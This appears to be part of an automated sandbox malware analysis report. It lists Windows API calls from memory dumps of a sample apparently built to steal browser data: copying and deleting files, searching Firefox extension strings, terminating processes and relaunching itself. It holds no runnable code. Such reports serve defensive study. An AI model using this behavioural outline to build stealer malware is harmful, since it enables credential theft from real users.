                                                    • Part of subcall function 00B4AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 00B4AC2C
                                                    • Part of subcall function 00B4AC17: lstrcpy.KERNEL32(00000000), ref: 00B4AC6B
                                                    • Part of subcall function 00B4AC17: lstrcat.KERNEL32(00000000,00000000), ref: 00B4AC79
                                                    • Part of subcall function 00B4AB07: lstrcpy.KERNEL32(?,00420E17), ref: 00B4AB6C
                                                  • ShellExecuteEx.SHELL32(0000003C), ref: 00B4698D
                                                  • ExitProcess.KERNEL32 ref: 00B469BC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2280246170.0000000000B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                                  • String ID: <
                                                  • API String ID: 1148417306-4251816714
                                                  • Opcode ID: 4ae30b859fc942c9587f152936d11ec8aa2d9d08854ccb4cb357e31b47128d92
                                                  • Instruction ID: 3b42b035f5e55bf99209eceb9ba270a7737632ddddc56eeb37e902fa20c1cf48
                                                  • Opcode Fuzzy Hash: 4ae30b859fc942c9587f152936d11ec8aa2d9d08854ccb4cb357e31b47128d92
                                                  • Instruction Fuzzy Hash: D43147F1941208ABDB14EB90DD86FEEB7B8AF04300F4051C9F205A6192DF746B88CF5A
                                                  APIs
                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00416663
                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                  • ShellExecuteEx.SHELL32(0000003C), ref: 00416726
                                                  • ExitProcess.KERNEL32 ref: 00416755
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2279322736.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2279322736.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                                  • String ID: <
                                                  • API String ID: 1148417306-4251816714
                                                  • Opcode ID: 5c242e9f6f242afdfd3d50008aa43d31dcc14585de71cbfc0ed53ce080c09176
                                                  • Instruction ID: 5b5f5c47f0bfa9475b258acd8296b8f4f2330d650783268263d73b7fdd640aa3
                                                  • Opcode Fuzzy Hash: 5c242e9f6f242afdfd3d50008aa43d31dcc14585de71cbfc0ed53ce080c09176
                                                  • Instruction Fuzzy Hash: 7F314AB1C01208ABDB14EB91DD82FDEB778AF04314F40518EF20966191DF786B89CF6A
                                                  APIs
                                                  • VirtualProtect.KERNEL32(?,?,@Jn@,@Jn@), ref: 00406C9F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2279322736.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2279322736.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ProtectVirtual
                                                  • String ID: @Jn@$Jn@$Jn@
                                                  • API String ID: 544645111-1180188686
                                                  • Opcode ID: caf630da144662436c325b164354e3ce96217d6286d52214ffa948e93cb1361e
                                                  • Instruction ID: b746c2a28f05bbd6b1460d210bf7098c9bc173f160aa6dfc6dfdc57a011f18e7
                                                  • Opcode Fuzzy Hash: caf630da144662436c325b164354e3ce96217d6286d52214ffa948e93cb1361e
                                                  • Instruction Fuzzy Hash: FA213374E04208EFEB04CF84C544BAEBBB5FF48304F1181AAD54AAB381D3399A91DF85
                                                  APIs
                                                  • lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                  • lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2279322736.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2279322736.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcatlstrcpy
                                                  • String ID: vI@$vI@
                                                  • API String ID: 3905823039-1245421781
                                                  • Opcode ID: 944da6e453fcb66f0d11250dd24ec57f51aa285ffba2b214b4798455d692dd31
                                                  • Instruction ID: 271a46469eabd2290b2e3c410fce444a88fb87627d9bf606efbbe474ae7d75ee
                                                  • Opcode Fuzzy Hash: 944da6e453fcb66f0d11250dd24ec57f51aa285ffba2b214b4798455d692dd31
                                                  • Instruction Fuzzy Hash: F011E878901108EFCB05EF94D885AEEB3B5FF49314F108599E825AB391C734AE92CF95
                                                  APIs
                                                  • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0041951E,00000000), ref: 00418D5B
                                                  • HeapAlloc.KERNEL32(00000000,?,?,0041951E,00000000), ref: 00418D62
                                                  • wsprintfW.USER32 ref: 00418D78
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2279322736.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2279322736.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Heap$AllocProcesswsprintf
                                                  • String ID: %hs
                                                  • API String ID: 659108358-2783943728
                                                  • Opcode ID: 308207b7b7d6c7c9756ec14eecfab78ddd1d2e288a316a00ead5d509718cb0e2
                                                  • Instruction ID: e0c39cc4b97fe4de81499882959c588a1d03a161ade5b5bfa375175f6a3fb920
                                                  • Opcode Fuzzy Hash: 308207b7b7d6c7c9756ec14eecfab78ddd1d2e288a316a00ead5d509718cb0e2
                                                  • Instruction Fuzzy Hash: 96E08CB8A80208BFC710DBD4EC0AE697BB8EB05702F000194FE0A87280DA719E008B96
                                                  APIs
                                                  • lstrcatA.KERNEL32(?,?,?,00000104,?,00000104), ref: 00413935
                                                  • StrCmpCA.SHLWAPI(?,00420F70), ref: 00413947
                                                  • StrCmpCA.SHLWAPI(?,00420F74), ref: 0041395D
                                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00413C67
                                                  • FindClose.KERNEL32(000000FF), ref: 00413C7C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2279322736.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2279322736.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Find$CloseFileNextlstrcat
                                                  • String ID: !=A$P2#v
                                                  • API String ID: 3840410801-2183312394
                                                  • Opcode ID: 28feb7c8be81de4ab4b55bfcc7f9479259f5a9bafbd7cecf7f5c2433705f41d5
                                                  • Instruction ID: 20ec2b31cb4d991c835852fde49fc2354676703d0d5a57c203257a76fc367b8d
                                                  • Opcode Fuzzy Hash: 28feb7c8be81de4ab4b55bfcc7f9479259f5a9bafbd7cecf7f5c2433705f41d5
                                                  • Instruction Fuzzy Hash: FCD012756401096BCB20EF90DD589EA7779DB55305F0041C9B40EA6150EB399B818B95
                                                  APIs
                                                    • Part of subcall function 00B4A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B4A9EF
                                                    • Part of subcall function 00B4AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 00B4AC2C
                                                    • Part of subcall function 00B4AC17: lstrcpy.KERNEL32(00000000), ref: 00B4AC6B
                                                    • Part of subcall function 00B4AC17: lstrcat.KERNEL32(00000000,00000000), ref: 00B4AC79
                                                    • Part of subcall function 00B4AB07: lstrcpy.KERNEL32(?,00420E17), ref: 00B4AB6C
                                                    • Part of subcall function 00B48DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,00B31660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 00B48DED
                                                    • Part of subcall function 00B4AB87: lstrcpy.KERNEL32(00000000,?), ref: 00B4ABD9
                                                    • Part of subcall function 00B4AB87: lstrcat.KERNEL32(00000000), ref: 00B4ABE9
                                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00B3A548
                                                  • lstrlen.KERNEL32(00000000,00000000), ref: 00B3A666
                                                  • lstrlen.KERNEL32(00000000), ref: 00B3A923
                                                    • Part of subcall function 00B4AA07: lstrcpy.KERNEL32(?,00000000), ref: 00B4AA4D
                                                    • Part of subcall function 00B3A077: memcmp.MSVCRT(?,00421264,00000003), ref: 00B3A094
                                                  • DeleteFileA.KERNEL32(00000000), ref: 00B3A9AA
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2280246170.0000000000B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTimememcmp
                                                  • String ID:
                                                  • API String ID: 257331557-0
                                                  • Opcode ID: 725788eba44463d4c513e2756b6ea09236ad55c473157db14b89c348e9807f7b
                                                  • Instruction ID: 4683363b6f631b3e88d3eaf443cae348333401d4f4a9fdc3acaf7c798965582b
                                                  • Opcode Fuzzy Hash: 725788eba44463d4c513e2756b6ea09236ad55c473157db14b89c348e9807f7b
                                                  • Instruction Fuzzy Hash: F7E103B29901189BCB04FBA4DD92EEEB379AF14700F508199F55672092EF346B48DF62
                                                  APIs
                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                    • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,00844840,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                                    • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                    • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040A2E1
                                                  • lstrlenA.KERNEL32(00000000,00000000), ref: 0040A3FF
                                                  • lstrlenA.KERNEL32(00000000), ref: 0040A6BC
                                                    • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                    • Part of subcall function 00409E10: memcmp.MSVCRT(?,v20,00000003), ref: 00409E2D
                                                  • DeleteFileA.KERNEL32(00000000), ref: 0040A743
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2279322736.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2279322736.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTimememcmp
                                                  • String ID:
                                                  • API String ID: 257331557-0
                                                  • Opcode ID: d20ad723e4956a4f5593e547689fc6f06bc1426b2961df15eb96e4f5265ec8e9
                                                  • Instruction ID: ddd88d02e0d3355bf8470c19a8c4de6788c323a7c51f3fd4630425147b47cfd6
                                                  • Opcode Fuzzy Hash: d20ad723e4956a4f5593e547689fc6f06bc1426b2961df15eb96e4f5265ec8e9
                                                  • Instruction Fuzzy Hash: 85E134728111089ACB04FBA5DD91EEE733CAF14314F50815EF51672091EF386A9ECB7A
                                                  APIs
                                                    • Part of subcall function 00B4A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B4A9EF
                                                    • Part of subcall function 00B4AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 00B4AC2C
                                                    • Part of subcall function 00B4AC17: lstrcpy.KERNEL32(00000000), ref: 00B4AC6B
                                                    • Part of subcall function 00B4AC17: lstrcat.KERNEL32(00000000,00000000), ref: 00B4AC79
                                                    • Part of subcall function 00B4AB07: lstrcpy.KERNEL32(?,00420E17), ref: 00B4AB6C
                                                    • Part of subcall function 00B48DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,00B31660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 00B48DED
                                                    • Part of subcall function 00B4AB87: lstrcpy.KERNEL32(00000000,?), ref: 00B4ABD9
                                                    • Part of subcall function 00B4AB87: lstrcat.KERNEL32(00000000), ref: 00B4ABE9
                                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00B3D6E8
                                                  • lstrlen.KERNEL32(00000000), ref: 00B3D8FF
                                                  • lstrlen.KERNEL32(00000000), ref: 00B3D913
                                                  • DeleteFileA.KERNEL32(00000000), ref: 00B3D992
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2280246170.0000000000B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                                  • String ID:
                                                  • API String ID: 211194620-0
                                                  • Opcode ID: 2bccf2adba0c6573149dfae4533d97fd852c73f86cd25f235fac12d5c73a1e08
                                                  • Instruction ID: fe9d8b819a2325da5cfe4bd7f5e378c11d566388c22b2c1f982e47d20fa3f99c
                                                  • Opcode Fuzzy Hash: 2bccf2adba0c6573149dfae4533d97fd852c73f86cd25f235fac12d5c73a1e08
                                                  • Instruction Fuzzy Hash: D69104B19901049BCB08FBA4DD96EEE73B9AF14700F5041ADF54672092EF346B48DF62
                                                  APIs
                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                    • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,00844840,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                                    • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                    • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040D481
                                                  • lstrlenA.KERNEL32(00000000), ref: 0040D698
                                                  • lstrlenA.KERNEL32(00000000), ref: 0040D6AC
                                                  • DeleteFileA.KERNEL32(00000000), ref: 0040D72B
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2279322736.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2279322736.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                                  • String ID:
                                                  • API String ID: 211194620-0
                                                  • Opcode ID: 51504f8183e0b2e6ebec12441f0f26ba584a9b89164c583ff874fdf13874234a
                                                  • Instruction ID: 265a03a5026cdf5fd4b8160f1a7263b5072f0f83edca8c83d8fca220a3e7f1c0
                                                  • Opcode Fuzzy Hash: 51504f8183e0b2e6ebec12441f0f26ba584a9b89164c583ff874fdf13874234a
                                                  • Instruction Fuzzy Hash: 8A9145719111089BCB04FBA1DD92EEE7339AF14318F50452EF50772091EF386A9ACB7A
                                                  APIs
                                                    • Part of subcall function 00B4A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B4A9EF
                                                    • Part of subcall function 00B4AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 00B4AC2C
                                                    • Part of subcall function 00B4AC17: lstrcpy.KERNEL32(00000000), ref: 00B4AC6B
                                                    • Part of subcall function 00B4AC17: lstrcat.KERNEL32(00000000,00000000), ref: 00B4AC79
                                                    • Part of subcall function 00B4AB07: lstrcpy.KERNEL32(?,00420E17), ref: 00B4AB6C
                                                    • Part of subcall function 00B48DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,00B31660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 00B48DED
                                                    • Part of subcall function 00B4AB87: lstrcpy.KERNEL32(00000000,?), ref: 00B4ABD9
                                                    • Part of subcall function 00B4AB87: lstrcat.KERNEL32(00000000), ref: 00B4ABE9
                                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00B3DA68
                                                  • lstrlen.KERNEL32(00000000), ref: 00B3DC06
                                                  • lstrlen.KERNEL32(00000000), ref: 00B3DC1A
                                                  • DeleteFileA.KERNEL32(00000000), ref: 00B3DC99
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2280246170.0000000000B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                                  • String ID:
                                                  • API String ID: 211194620-0
                                                  • Opcode ID: 75d72e7265c2b0bcdfeb4fd8a00493fe315c357100f507a1e1d65a562648f628
                                                  • Instruction ID: 827d61e2daac03fe9cf8ad83ac10760338a8b5df5dcc89bcc472374633c65505
                                                  • Opcode Fuzzy Hash: 75d72e7265c2b0bcdfeb4fd8a00493fe315c357100f507a1e1d65a562648f628
                                                  • Instruction Fuzzy Hash: 868115B19901049BCB08FBA4DD96EEE73B9EF14700F5045ADF44662092EF346B48DF62
                                                  APIs
                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                    • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,00844840,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                                    • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                    • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040D801
                                                  • lstrlenA.KERNEL32(00000000), ref: 0040D99F
                                                  • lstrlenA.KERNEL32(00000000), ref: 0040D9B3
                                                  • DeleteFileA.KERNEL32(00000000), ref: 0040DA32
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2279322736.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2279322736.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                                  • String ID:
                                                  • API String ID: 211194620-0
                                                  • Opcode ID: 370323d9a074025678898ae999b6463eb423e9135e59877d35bb5260e336077f
                                                  • Instruction ID: 30f7704c13366a17925c5eaa4a94e79927efa66a8a92483c7baa761e0d0dbf9b
                                                  • Opcode Fuzzy Hash: 370323d9a074025678898ae999b6463eb423e9135e59877d35bb5260e336077f
                                                  • Instruction Fuzzy Hash: 848122719111089BCB04FBE1DD52EEE7339AF14314F50452EF407A6091EF386A9ACB7A
                                                  APIs
                                                    • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                    • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                                    • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                                    • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                                    • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                                    • Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
                                                    • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                                    • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                    • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                    • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                  • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00421580,00420D92), ref: 0040F54C
                                                  • lstrlenA.KERNEL32(00000000), ref: 0040F56B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2279322736.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2279322736.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                                                  • String ID: ^userContextId=4294967295$moz-extension+++
                                                  • API String ID: 998311485-3310892237
                                                  • Opcode ID: c6d68fb0603da1e25a23b90469779a044771ff029b5026b29d5fc07adc8ee29f
                                                  • Instruction ID: 431312e06e4e118a9a68feb07ac8eaa96768a2afdec7ba1937323e72019175af
                                                  • Opcode Fuzzy Hash: c6d68fb0603da1e25a23b90469779a044771ff029b5026b29d5fc07adc8ee29f
                                                  • Instruction Fuzzy Hash: 19516575D11108AACB04FBB1DC52DED7338AF54314F40852EF81667191EE386B9ACBAA
                                                  APIs
                                                  • memset.MSVCRT ref: 00B49752
                                                    • Part of subcall function 00B48FB7: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00B49785,00000000), ref: 00B48FC2
                                                    • Part of subcall function 00B48FB7: RtlAllocateHeap.NTDLL(00000000), ref: 00B48FC9
                                                    • Part of subcall function 00B48FB7: wsprintfW.USER32 ref: 00B48FDF
                                                  • OpenProcess.KERNEL32(00001001,00000000,?), ref: 00B49812
                                                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 00B49830
                                                  • CloseHandle.KERNEL32(00000000), ref: 00B4983D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2280246170.0000000000B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
